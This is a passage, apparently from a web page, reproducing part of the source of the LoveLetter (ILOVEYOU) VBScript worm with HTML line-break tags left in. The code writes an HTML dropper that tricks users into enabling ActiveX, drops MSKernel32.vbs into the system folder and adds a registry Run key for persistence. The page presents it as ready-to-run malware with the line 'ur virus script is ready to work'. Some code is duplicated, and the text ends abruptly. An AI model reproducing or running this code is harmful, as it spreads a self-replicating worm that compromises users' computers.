/>dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") <br />dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") <br />set fso=CreateObject("Scripting.FileSystemObject") <br />set c=fso.OpenTextFile(WScript.ScriptFullName,1) <br />lines=Split(c.ReadAll,vbcrlf) <br />l1=ubound(lines) <br />for n=0 to ubound(lines) <br />lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) <br />lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) <br />lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) <br />if (l1=n) then <br />lines(n)=chr(34)+lines(n)+chr(34) <br />else <br />lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" <br />end if <br />next <br />set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") <br />b.close <br />set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) <br />d.write dt5 <br />d.write join(lines,vbcrlf) <br />d.write vbcrlf <br />d.write dt6 <br />d.close <br />end sub <br /> <br /> <br />Save this file into .vbs format & ur virus script is ready to work.. <br /><title>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _<br>"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _<br>"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _<br>"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _<br>"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _<br>"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _<br>"<?-?BODY><?-?HTML>"&vbcrlf& _<br>"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _<br>"<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _<br>"<?-?SCRIPT>"&vbcrlf& _<br>"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _<br>"<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _<br>"<?-?SCRIPT>"<br>dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")<br>dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")<br>dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")<br>dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")<br>dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")<br>dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")<br>dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")<br>dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")<br>set fso=CreateObject("Scripting.FileSystemObject")<br>set c=fso.OpenTextFile(WScript.ScriptFullName,1)<br>lines=Split(c.ReadAll,vbcrlf)<br>l1=ubound(lines)<br>for n=0 to ubound(lines)<br>lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))<br>lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))<br>lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))<br>if (l1=n) then<br>lines(n)=chr(34)+lines(n)+chr(34)<br>else<br>lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"<br>end if<br>next<br>set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")<br>b.close<br>set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)<br>d.write dt5<br>d.write join(lines,vbcrlf)<br>d.write vbcrlf<br>d.write dt6<br>d.close<br>end sub<br>
Labels: